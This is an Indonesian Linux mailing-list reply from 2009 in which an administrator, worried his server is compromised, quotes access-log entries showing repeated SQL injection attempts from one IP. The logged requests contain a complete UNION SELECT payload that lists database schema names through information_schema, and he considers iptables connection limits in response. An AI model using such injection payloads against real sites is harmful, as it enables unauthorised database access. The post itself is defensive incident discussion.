Re: [tanya-jawab] Cek apakah server sdh compromised ?

Wed, 29 Jul 2009 19:02:23 -0700 

On Thu, Jul 30, 2009 at 01:54:22AM +0000, Arief Yudhawarman wrote:
> 
> Dia mau masuk sebagai user dhan dan leqhi.
> Berdasarkan whois ip 114.58.x.x itu ip indosat sedangkan 70.84.178.x itu
> milik theplanet. Perlu dilaporkan ke pihak berwenang (indosat) tidak ?
> Belum pernah sih mengalami hal ini jadi belum tahu protap-nya.

Tambahan lagi ada banyak serangan sql injection di /var/log/htdocs/*access.log 
yang 
berasal dari ip indosat di atas.

114.58.53.4 - - [21/Jul/2009:15:22:32 +0700] "GET 
/iniwebnya/news/newsdetail.php?id_news=2+AND+1=2+UNION+SELECT+0,concat(0x1e,0 
x1e,schema_name,0x1e,0x20),2,3,4,5,6,7,8,9+FROM+information_schema.schemata+WHERE+schema_name!=0x696e666f726d6174696f6e5f73
 6368656d61+LIMIT+1,1-- HTTP/1.1" 200 4716
114.58.53.4 - - [21/Jul/2009:15:22:33 +0700] "GET 
/iniwebnya/news/newsdetail.php?id_news=2+AND+1=2+UNION+SELECT+0,concat(0x1e,0 
x1e,schema_name,0x1e,0x20),2,3,4,5,6,7,8,9+FROM+information_schema.schemata+WHERE+schema_name!=0x696e666f726d6174696f6e5f73
 6368656d61+LIMIT+2,1-- HTTP/1.1" 200 4714
114.58.53.4 - - [21/Jul/2009:15:22:34 +0700] "GET 
/iniwebnya/news/newsdetail.php?id_news=2+AND+1=2+UNION+SELECT+0,concat(0x1e,0 
x1e,schema_name,0x1e,0x20),2,3,4,5,6,7,8,9+FROM+information_schema.schemata+WHERE+schema_name!=0x696e666f726d6174696f6e5f73
 6368656d61+LIMIT+3,1-- HTTP/1.1" 200 4724
114.58.53.4 - - [21/Jul/2009:15:22:35 +0700] "GET 
/iniwebnya/news/newsdetail.php?id_news=2+AND+1=2+UNION+SELECT+0,concat(0x1e,0 
x1e,schema_name,0x1e,0x20),2,3,4,5,6,7,8,9+FROM+information_schema.schemata+WHERE+schema_name!=0x696e666f726d6174696f6e5f73
 6368656d61+LIMIT+4,1-- HTTP/1.1" 200 4712
114.58.53.4 - - [21/Jul/2009:15:22:36 +0700] "GET 
/iniwebnya/news/newsdetail.php?id_news=2+AND+1=2+UNION+SELECT+0,concat(0x1e,0 
x1e,schema_name,0x1e,0x20),2,3,4,5,6,7,8,9+FROM+information_schema.schemata+WHERE+schema_name!=0x696e666f726d6174696f6e5f73
 6368656d61+LIMIT+5,1-- HTTP/1.1" 200 4717

Keliatannya perlu patch kernel dengan limit connection untuk iptables nich.

-- 

Terimakasih sebelumnya.

Salam,

~~ Arief Yudhawarman ~~


-- 
FAQ milis di http://wiki.linux.or.id/FAQ_milis_tanya-jawab
Unsubscribe: kirim email ke tanya-jawab-unsubscr...@linux.or.id
Arsip dan info milis selengkapnya di http://linux.or.id/milis

Kirim email ke